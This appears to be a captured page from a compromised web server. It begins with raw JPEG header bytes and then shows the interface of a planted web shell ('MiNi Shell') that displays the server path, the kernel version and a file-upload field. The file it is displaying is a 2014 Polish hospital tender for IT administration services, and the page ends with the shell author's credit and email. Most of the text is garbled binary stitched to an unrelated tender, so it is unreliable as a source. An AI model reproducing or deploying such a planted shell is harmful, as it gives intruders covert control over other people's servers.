JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140509/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140509/100511-N-2014.html

<p class="kh_header"><b>Elbląg: Przetarg nieograniczony na świadczenie usług w zakresie administrowania istniejącą siecią informatyczną, oprogramowaniem oraz konserwacji i naprawie posiadanego sprzętu komputerowego wraz z urządzeniami peryferyjnymi</b><br>
<b>Numer ogłoszenia: 100511 - 2014; data zamieszczenia: 09.05.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samodzielny Publiczny Specjalistyczny Zakład Opieki Zdrowotnej Szpital Miejski im. Jana Pawła II w Elblągu , ul. Żeromskiego 22, 82-300 Elbląg, woj. warmińsko-mazurskie, tel. 055 230-41-97, faks 055 230-41-50.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szpitalmiejski.elblag.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przetarg nieograniczony na świadczenie usług w zakresie administrowania istniejącą siecią informatyczną, oprogramowaniem oraz konserwacji i naprawie posiadanego sprzętu komputerowego wraz z urządzeniami peryferyjnymi.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Mininalny zakres zamówienia:
1.	Administracja serwerem Linux (serwer bazy Oracle 9i- Eskulap, serwer bazy Oracle 12 Kamsoft):
okresowa konserwacja serwera
okresowa konserwacja systemu operacyjnego
Nadzór nad funkcjonowaniem bazy danych Oracle,
Zarządzanie prawami dostępu do bazy danych
2.	Administracja serwerem Linux (serwer PacsRis oraz bazy Sybase):
okresowa konserwacja serwera
okresowa konserwacja systemu operacyjnego
3.	Administracja serwerem Linux (serwer WWW, email)
okresowa konserwacja serwera
okresowa konserwacja systemu operacyjnego
administracja kontami e-mail
4.	Administracja serwerem Windows (baza MS-SQL)
okresowa konserwacja serwera
administracja bazy MS-SQL
okresowa konserwacja systemu operacyjnego
5.	Administracja Serwerami Wirtualizacji HYPER-V 2012
6.	Administracja Serwerami Active Directory (Kontrolery Domeny, Serwery Terminalowe)
Instalowanie i zarządzanie kontrolerem domeny (członkostwo grup użytkowników, nadawanie uprawnień,
tworzenie kont użytkowników i grup, resetowanie nadawanie haseł użytkownikom),
Zarządzanie aplikacjami na serwerze terminali oraz serwerze Active Directory 
Tworzenie skryptów administracyjnych, skryptów logowania, -Wsparcie dla użytkowników w zakresie aplikacji baz danych,
Zarządzanie replikacją mobilnych katalogów użytkowników (profile użytkowników), przestrzenią dyskową serwerów i macierzy, plikami i folderami sieciowymi, 
Monitorowanie ruchu sieciowego w obrębie serwerów, 
Monitorowanie zdarzeń dotyczących zabezpieczeń w obrębie serwerów,
Monitorowanie  wydajności   serwerów  oraz   macierzy,   na  także   usług  procesów  działających   na poszczególnych serwerach,
7.	Administracja serwera Novell
okresowa konserwacja serwera
kontrola modyfikacja uprawnień użytkowników
okresowa konserwacja systemu operacyjnego
8.	Sieć LAN:
administrowanie i zarządzanie infrastrukturą
przeprowadzanie okresowych przeglądów
sporządzanie raportów dotyczących funkcjonowania infrastruktury technicznej
wykonywanie prac instalacyjnych
instalacja urządzeń sieciowych
konfiguracja urządzeń (router, Firewall, switch)
konfiguracja połączeń
Wdrożenie zatwierdzonych do stosowania zaleceń dotyczących polityki bezpieczeństwa informacji,
Prowadzenie stałego nadzoru oraz wprowadzenie zabezpieczeń przed nieautoryzowanym dostępem do sieci komputerowej,
9.	Infrastruktura sprzętowa- zarządzanie i utrzymanie infrastruktury informatycznej wykorzystywanej przez użytkowników w tym:
stacjami roboczymi
drukarkami
monitorami
nnymi urządzeniami peryferyjnymi
10.	Wsparcie w zakresie platformy systemowej i oprogramowania użytkowego:
zarządzanie oraz utrzymanie systemów operacyjnych stacji roboczych, oprogramowania biurowego różnych producentów oraz aplikacji zainstalowanych na stacjach roboczych. W tym zakresie wymagane jest wykonywanie przeglądów oraz czynności konfiguracyjnych stacji roboczych, mające na celu utrzymanie stabilności, wydajności, wysokiej funkcjonalności oraz bezpieczeństwa systemów operacyjnych oprogramowania użytkowego.
usługi serwisowe oraz doradcze oprogramowania Płatnik, Symfonia: Środki Trwałe Forte, Handel Fotte, Finanse Księgowość Forte, Analizy finansowe, systemu kadrowo-płacowego Magie systemu rozliczeń umów z NFZ KS- PPS, oprogramowania do badań endoskopowych oraz ginekologicznych minilRIS, oprogramowania opisowego rentgenowskich obrazów cyfrowych EFILM, oprogramowania do badań
densytometrycznych QDR, oprogramowania do dziennych testów klisz rentgenowskich Infosens 3, oprogramowania pracowni urodynamicznej picoSOOO oraz innych użytkowanych przez Zamawiającego.

11.	Współpraca przy wczytywaniu umów z Działem Rozliczeń Zamawiającego z NFZ
12.	Opracowanie Polityki kopii bezpieczeństwa i archiwizacji
Wykonywanie bieżących kopii bezpieczeństwa danych
13.	Wykonawca musi posiadać znajomość modułów systemu obsługi Szpitala: KS-ZZL,KS-MEDIS,KS-SOLAB,KS-ASW,KSPL,KS-KOSZTY
14.	Czuwanie nad bezpieczeństwem systemów operacyjnych
15.	Świadczenie konsultacji, pomocy i doradztwa związanego z eksploatacją systemów operacyjnych
serwerów oraz stacji roboczych w godzinach urzędowania Zamawiającego
16.	Przeprowadzanie niezbędnych konserwacji i remontów elementów sieci informatycznej
17.	Utrzymanie stałego łącza należącego do Zamawiającego w stanie umożliwiającym korzystanie z usług
dostępnych w sieci Internet
18.	Obsługa i zarządzanie oficjalną stroną internetową oraz kontami pocztowymi użytkowników
19.	Ścisła współpraca z firmą:
Siemens sp. z o. o. w zakresie serwisowania urządzeń rentgenowskich Axiom Aristis FX Plus oraz Mammomat 1000
Sage sp. z o. o. w zakresie programu Symfonia
Kamsoft w zakresie Elektronicznego Systemu obsługi Szpitala.
20.	Opieka nad elektronicznym systemem obsługi szpitala Eskulap
21.	Usuwanie awarii sieci informatycznej i sprzętu komputerowego
22.	Pomoc przy uzyskiwaniu danych niezbędnych do dokonywania analiz statystycznych
23.	Utrzymywanie wysokiego poziomu zabezpieczeń serwerów
24.	Utrzymywanie wysokiego poziomu zabezpieczeń sieci teleinformatycznej
25.	Sporządzanie sprawozdań z wykonania Zamówienia, z zastrzeżeniem, że Zamawiający będzie mógł
żądać przedstawienia takiego sprawozdania nie częściej niż raz na miesiąc
26.	Doradztwo w zakresie planów modernizacji sprzętu oraz oprogramowania wraz z wydawaniem
orzeczeń technicznych dotyczących sprzętu komputerowego użytkowanego przez Zamawiającego
27.	Przystępowanie do usuwania zgłoszonych awarii (tj. nieprzewidywalnych zdarzeń, innych niż siła
wyższa, które uniemożliwiają korzystanie z sieci informatycznej), przy czym czas reakcji nie będzie
mógł być dłuższy niż:
15 minut w przypadku awarii, które wystąpiły w dni robocze w godz. od 7:00 do 20:00
1 godz. w przypadku awarii, które wystąpiły w dni robocze w godz. od 20:00 do 7:00
2 godz. w przypadku awarii, które wystąpiły w dniach ustawowo wolnych od pracy
28.	W razie awarii serwerów lub macierzy dyskowych uniemożliwiającej naprawę, lub gdy
naprawa nie byłaby uzasadniona ekonomicznie, Wykonawca zagwarantuje sprzęt
zastępczy umożliwiający ciągłość pracy całego systemu informatycznego do momentu
zakupienia przez Zamawiającego nowego sprzętu
29.	Informowanie wyczerpująco o przyczynie, skutkach i prawdopodobnym czasie trwania awarii oraz dołożenie  wszelkich   starań   w  celu   zapewnienia   alternatywnego   sposobu   korzystania   z  sieci informatycznej i jej zasobów
30.	Uprzedzanie  o  konieczności   wejścia   personelu  do  pomieszczeń  Szpitala   i   wykonywanie  prac zmierzające do usunięcia awarii w sposób możliwie najmniej uciążliwy dla działalności Szpitala
31.	Zawiadamianie  z  co  najmniej  siedmiodniowym  wyprzedzeniem  o   planowanych   przerwach   lub zakłóceniach   zwykłej   działalności   sieci   informatycznej   wynikających   z   konieczności   dokonania konserwacji lub remontów
32.	W przypadku awarii sprzętu i konieczności wymiany elementów, dokonywanie oszacowania kosztów naprawy i uzyskania zgody na jej wykonanie
33.	Zapewnienie obecności jednego pracownika na terenie Szpitala w dni robocze od godz. 8°° do godz. 14°° (6 godzin dziennie).
34.	W przypadku nieobecności pracownika działu IT Zamawiającego, pełnienie obowiązków pełnionych przez pracownika..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 72.51.10.00-0, 72.51.41.00-2, 72.51.43.00-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 48.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie wymagane</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie Wykonawcy, że spełnia warunki określone w art. 22 ust. 1 ustawy Pzp</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane - z dowodami (np.: referencje) potwierdzającymi należyte wykonanie lub należyte wykonywanie w dalszym ciągu usługi administrowania siecią informatyczną w jednostkach ochrony zdrowia (Załącznik nr 6),
Sposób dokonania oceny spełnienia warunku: 
Warunek zostanie spełniony, jeżeli Wykonawca wykaże, iż w okresie ostatnich trzech latach przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał minimum jedną usługę administrowania siecią informatyczną w jednostce ochrony zdrowia, która w swoim zakresie obejmowała min.: obsługę systemów: Eskulap, Symfonia, Magic oraz systemów medycznych w zakresie min.: KS- PPS, KS-ZZL, KS-MEDIS, KS-SOLAB, KS-ASW, KSPL, KS-KOSZTY.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie Wykonawcy, że spełnia warunki określone w art. 22 ust. 1 ustawy Pzp</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie Wykonawcy, że spełnia warunki określone w art. 22 ust. 1 ustawy Pzp</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wymaga, aby Wykonawca posiadał na dzień zawarcia umowy opłacone ubezpieczenie odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.
Sposób dokonania oceny spełnienia warunku: 
warunek za spełniony, gdy Wykonawca od oferty dołączy oświadczenie, iż w dniu podpisania umowy, będzie posiadał opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie w zakresie prowadzonej działalności gospodarczej.  Wartość w/w. polisy lub dokumentu powinna wynosić co najmniej 200 000 PLN</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.szpitalmiejski.elblag.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> SPSZOZ Szpital Miejski im. Jana Pawła II ul. Żeromskiego 22, 82-300 Elbląg.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.05.2014 godzina 08:50, miejsce: Sekretariat SPSZOZ Szpital Miejski im. Jana Pawła II ul. Żeromskiego 22, 82-300 Elbląg.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com